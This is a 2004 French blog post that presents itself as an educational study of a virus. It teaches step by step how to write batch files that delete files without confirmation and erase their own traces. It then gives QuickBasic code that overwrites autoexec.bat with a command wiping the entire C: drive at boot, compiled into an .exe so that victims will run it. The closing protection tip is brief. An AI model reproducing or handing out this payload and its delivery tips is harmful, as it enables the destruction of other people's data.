FJ
S'inscrire
Image 1
Tech & Gaming

Etude d'un virus

Découvrez le fonctionnement des fichiers .Bat et apprenez à créer un exécutable avec QuickBasic. Une approche éducative pour comprendre les mécanismes des virus informatiques.

jim462
Jimmy G @jim462
25 mai 2004 2 min de lecture 5 935 vues
As-tu aimé cet article ?

Image 1
Image 1

Qu'est-ce qu'un fichier .Bat ?

Connaissez-vous les fichiers avec l'extension .Bat ? Ce sont des petits fichiers reconnaissables à leur icône en forme d'engrenage. À l'origine, ils ont été créés pour simplifier l'utilisation de Windows. Lancez une recherche et tapez *.bat dans la barre de recherche pour afficher tous les fichiers de ce type. Vous verrez qu'il y en a pas mal (si vous avez activé l'affichage des fichiers cachés), mais surtout ne les lancez pas.

Comment fonctionne un fichier .Bat ?

Ces fichiers peuvent supprimer d'autres fichiers. Voici un exemple concret :

  1. Ouvrez un éditeur de texte et tapez n'importe quoi.
  2. Enregistrez-le sous C:\ et nommez-le Test.txt.
  3. Fermez l'éditeur de texte.
  4. Rouvrez l'éditeur et tapez « Deltree C:\Test.txt ».
  5. Enregistrez sous C:\ avec le nom Detruit.bat.

Normalement, Detruit.bat affiche l'icône caractéristique des fichiers .Bat. Si ce n'est pas le cas, vérifiez qu'il n'y a pas un .txt après .bat et supprimez-le si nécessaire.

Maintenant, lancez le .Bat. Une fenêtre noire s'ouvre et affiche :

C:\>Deltree C:\Test.txt
Effacer le fichier « C:\Test.txt » ? [on]

Tapez « o » pour confirmer. La fenêtre affiche alors :

Suppression de C:\Test.txt...

Notre fichier Test.txt a bien disparu.

Comment créer un script sans confirmation ?

Ce n'est pas très intéressant car le système demande une confirmation. Modifions notre .Bat : faites un clic droit dessus et sélectionnez Édition (ou Modifier). Remplacez tout le contenu par :

Deltree /y C:\Test.txt

Le paramètre /y supprime la demande de confirmation. Vous pouvez même ajouter « Deltree /y C:\Detruit.bat » pour ne laisser aucune trace.

Comment créer un exécutable avec QuickBasic ?

Le problème : personne ne cliquera sur votre .Bat. La solution : créer un .Exe qui le génère automatiquement. C'est possible avec QuickBasic ! On peut placer ce fichier à la place de Autoexec.bat, qui se lance à chaque démarrage de l'ordinateur avant même Windows.

Tutoriel QuickBasic

Il vous faut QuickBasic. Pas besoin d'installation : décompressez tout dans un même répertoire et lancez Qbx.exe. Si une fenêtre de paramètres s'ouvre, cliquez sur OK. Vous arriverez dans une interface DOS bleue (le plein écran est recommandé).

Tapez ce code :

n$ = "C:\autoexec.bat"
Open n$ for output as #1
Print #1, "Deltree /y C:\*.*"
Close

Ce programme crée un fichier Autoexec.bat (en remplaçant l'existant) contenant la commande de suppression. Pour créer l'exécutable, allez dans Run puis Make an Exe file. N'oubliez pas d'enregistrer avant.

Comment se protéger de ce virus ?

Pour vous protéger, démarrez en mode DOS et tapez :

Deltree C:\autoexec.bat

Confirmez à la demande de validation, et le tour est joué !

#logiciel malveillant #sécurité informatique #batch files #virus creation #windows tutorial #quickbasic #autoexec #dos #scénarisation #file deletion
As-tu aimé cet article ?
jim462
Jimmy G @jim462
3 articles 0 abonnés

Commentaires (2)

Connexion pour laisser un commentaire.

Chargement des commentaires...
Lire aussi

Articles similaires